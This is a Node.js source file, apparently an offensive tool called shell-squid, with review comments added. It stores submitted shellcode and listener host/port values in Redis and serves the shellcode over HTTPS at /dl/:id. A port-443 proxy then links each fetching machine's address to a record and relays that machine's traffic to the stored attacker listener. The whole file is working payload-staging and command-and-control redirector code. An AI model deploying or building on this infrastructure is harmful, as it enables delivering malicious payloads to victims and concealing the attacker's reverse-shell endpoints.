shell-squid-test
// Copyright (c) 2012 Tom Steele
// See the file license.txt for copying permission
var fs = require('fs'); | |
var express = require('express'); | |
var redis = require('redis'); | |
var config = require('configure'); | |
var httpProxy = require('http-proxy'); | |
var https = require('https'); | |
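// Abort early when the configuration module produced nothing usable.
if (!config) {
  console.log('no config found');
  process.exit(1);
}

// TLS key and certificate handed to the HTTPS listeners in this file.
// Both files are read synchronously at startup, so a missing or unreadable
// path throws here instead of at the first connection.
// Declared with `var`: the original assigned to undeclared names, which
// creates process-wide globals and throws under strict mode.
var httpsOptions = {
  key: fs.readFileSync(config.ssl.key),
  cert: fs.readFileSync(config.ssl.cert)
};

// Express application that serves the API routes defined below.
var app = express();
// Body parsing lets req.param() see fields sent in a POST body.
// NOTE(review): in Express 3.x bodyParser() also enables multipart parsing,
// which writes uploads to the temp directory - confirm against the Express
// version in use that this is wanted.
app.use(express.bodyParser());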
// Connect to Redis using the client's default host and port.
var client = redis.createClient();

// A refused connection to the local Redis server is fatal; any other client
// error is only logged.
// NOTE(review): the refused-connection case is detected by comparing the
// full error text, so a differently worded message is only logged.
client.on('error', function onRedisError(err) {
  var refused = err.toString() === 'Error: Redis connection to 127.0.0.1:6379 failed - connect ECONNREFUSED';
  if (!refused) {
    console.log('Error', err);
    return;
  }
  console.log('Error connecting to redis server');
  console.log(err);
  process.exit(1);
});
/**
 * Placeholder stub: ignores its argument and always returns the same number.
 * Nothing in the visible file calls it.
 *
 * @param {*} name - unused
 * @returns {number} always 123
 */
function buildPayload(name) {
  var placeholder = 123;
  return placeholder;
}
/**
 * Placeholder stub: ignores its argument and always returns the same number.
 * Nothing in the visible file calls it.
 *
 * @param {*} name - unused
 * @returns {number} always 1234
 */
function buildRedis(name) {
  var placeholder = 1234;
  return placeholder;
}
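// GET /dl/:id - return the 'shellcode' field of the Redis hash stored under
// :id. This handler only reads; the caller's address is recorded by the proxy
// listener on 443, not here.
// NOTE(review): the route performs no authentication or authorization; any
// client that can reach it and supplies an existing id receives the stored
// value.
app.get('/dl/:id', function(req, res) {
  var id = req.param('id');
  if (!id) {
    res.json(200, { error: 'no id provided' });
    // Stop here: falling through would start a Redis lookup and attempt a
    // second response on the same request.
    return;
  }
  client.hget(id, 'shellcode', function(err, reply) {
    if (err) {
      console.log('Error', err);
      res.send('none');
      // Without this return the handler went on to call res.send(reply)
      // after the response had already been sent.
      return;
    }
    res.send(reply);
  });
});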
// GET /delete/:id - placeholder. Nothing is removed from Redis yet, but the
// caller is still told the operation succeeded.
// NOTE(review): once deletion is implemented this becomes a state-changing
// GET with no authentication check in front of it.
app.get('/delete/:id', function handleDelete(req, res) {
  var body = { response: 'success' };
  // TODO: delete all data associated with the id
  res.json(200, body);
});
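// POST /generate - allocate a numeric id and store the submitted record.
// Reads name, shellcode, lhost and lport via req.param(); name, shellcode and
// lhost are required, lport is stored as given. Writes two Redis entries: a
// string key name -> id, and a hash under the id holding the record.
// Responds with { id: <number> } on success or { error: ... } otherwise
// (validation errors keep the original HTTP 200 status).
//
// NOTE(review): no authentication on this route, and lhost/lport are stored
// unvalidated; the proxy listener later uses them as its upstream target.
// NOTE(review): the name key, the id hash and the per-address hash written by
// the proxy all share one Redis keyspace, so a name equal to an existing id
// or address overwrites that entry.
app.post('/generate', function(req, res) {
  var name = req.param('name');
  var shellcode = req.param('shellcode');
  var lport = req.param('lport');
  var lhost = req.param('lhost');
  if (!name) {
    res.json(200, { error: 'no name given' });
    return;
  }
  if (!shellcode) {
    res.json(200, { error: 'no shellcode provied' });
    return;
  }
  if (!lhost) {
    res.json(200, { error: 'no lhost provied' });
    return;
  }
  // NOTE(review): Math.random() is not a cryptographic source, the id is at
  // most six digits, and nothing checks whether the id is already in use, so
  // an existing record under the same id would be overwritten. Treat the id
  // as an identifier, not as a secret.
  var newId = Math.floor(Math.random() * 1000000);

  // Shared failure path so each request gets exactly one response.
  function fail(err) {
    console.log(err);
    res.json({ error: err });
  }

  // The writes are chained so the success response is sent only after both
  // have completed. The original answered { id } immediately and could then
  // try to send a second response from the set() error callback.
  client.set(name, newId, function(err) {
    if (err) {
      fail(err);
      return;
    }
    client.hmset(newId, 'name', name, 'shellcode', shellcode, 'ip', '', 'lhost', lhost, 'lport', lport, function(err) {
      if (err) {
        fail(err);
        return;
      }
      res.json({ id: newId });
    });
  });
});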
// Start the HTTPS API server. The port is config.webport when that value is
// truthy, otherwise 8443.
var webPort = config.webport || 8443;
https.createServer(httpsOptions, app).listen(webPort);
console.log('Express service listening on', webPort);
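// Create and manage the HTTPS proxy server; the port (443) is not configurable.
//
// Routing is decided from the request URL alone:
//   - contains /dl/<1-7 digits>: record id <-> source address in Redis, then
//     forward to the local API server;
//   - contains /generate: forward to the local API server;
//   - contains a slash followed by a letter or hyphen: look up the id last
//     recorded for the source address and forward to that record's
//     lhost:lport.
// The patterns are passed to String.prototype.match as strings and are not
// anchored, so they match anywhere in the URL.
//
// NOTE(review): /generate is reachable through this listener with no
// authentication, and the upstream in the third branch comes from request
// data stored by /generate, so callers choose where this host forwards to.
// NOTE(review): a URL matching none of the branches never reaches handleIt
// and the request is left without a response.
https.createServer(httpsOptions, function (req, res) {
  // Initial target; every branch below replaces it before proxying, so this
  // default is never actually used.
  var proxyHost = 'www.google.com';
  var proxyPort = 443;
  var url = req.url;
  var sourceIp = req.connection.remoteAddress;
  // Created before any asynchronous work: http-proxy's buffer() holds the
  // request's events so they can be replayed once a target is known.
  var buffer = httpProxy.buffer(req);
  console.log('connection from', sourceIp);
  console.log('requesting', url);

  // Match once and reuse the capture. The original ran a second, slightly
  // different pattern (without the leading slash) to extract the id, which
  // could capture a different number than the one that selected this branch.
  var dlMatch = url.match('/dl/([0-9]{1,7})');
  if (dlMatch) {
    var id = dlMatch[1];
    // Fire-and-forget writes linking the id and the source address.
    client.hset(id, 'ip', sourceIp);
    client.hset(sourceIp, 'id', id);
    proxyHost = 'localhost';
    proxyPort = webPort;
    handleIt(proxyHost, proxyPort);
  }
  else if (url.match('/generate.*')) {
    proxyHost = 'localhost';
    proxyPort = webPort;
    handleIt(proxyHost, proxyPort);
  }
  else if (url.match('/[a-z-A-Z]+')) {
    // Look up the upstream host and port recorded for this source address.
    client.hget(sourceIp, 'id', function (err, reply) {
      if (err || !reply) {
        if (err) {
          console.log('Error', err);
        }
        // No id recorded for this address: answer instead of continuing with
        // an empty key.
        noUpstream();
        return;
      }
      client.hgetall(reply, function (err, obj) {
        if (err || !obj) {
          if (err) {
            console.log('Error', err);
          }
          // The original dereferenced obj unconditionally; a missing record
          // threw inside this callback and took the whole process down.
          noUpstream();
          return;
        }
        proxyHost = obj.lhost;
        proxyPort = obj.lport;
        handleIt(proxyHost, proxyPort);
      });
    });
  }

  // Answer 502 when no upstream can be determined for the request.
  function noUpstream() {
    res.writeHead(502);
    res.end();
  }

  // Forward the current request to ph:pp over HTTPS.
  function handleIt(ph, pp) {
    var proxy = new httpProxy.HttpProxy({
      target: {
        host: ph,
        port: pp,
        https: true,
        // NOTE(review): upstream certificate verification is disabled, so
        // the proxy cannot tell the intended upstream from anything else
        // answering on that host and port.
        rejectUnauthorized: false,
        // NOTE(review): buffer is passed inside `target` here; confirm
        // against the http-proxy version in use that this is where it is read.
        buffer: buffer
      }
    });
    proxy.proxyRequest(req, res);
  }
}).listen(443);
console.log('Proxy server listening on 443');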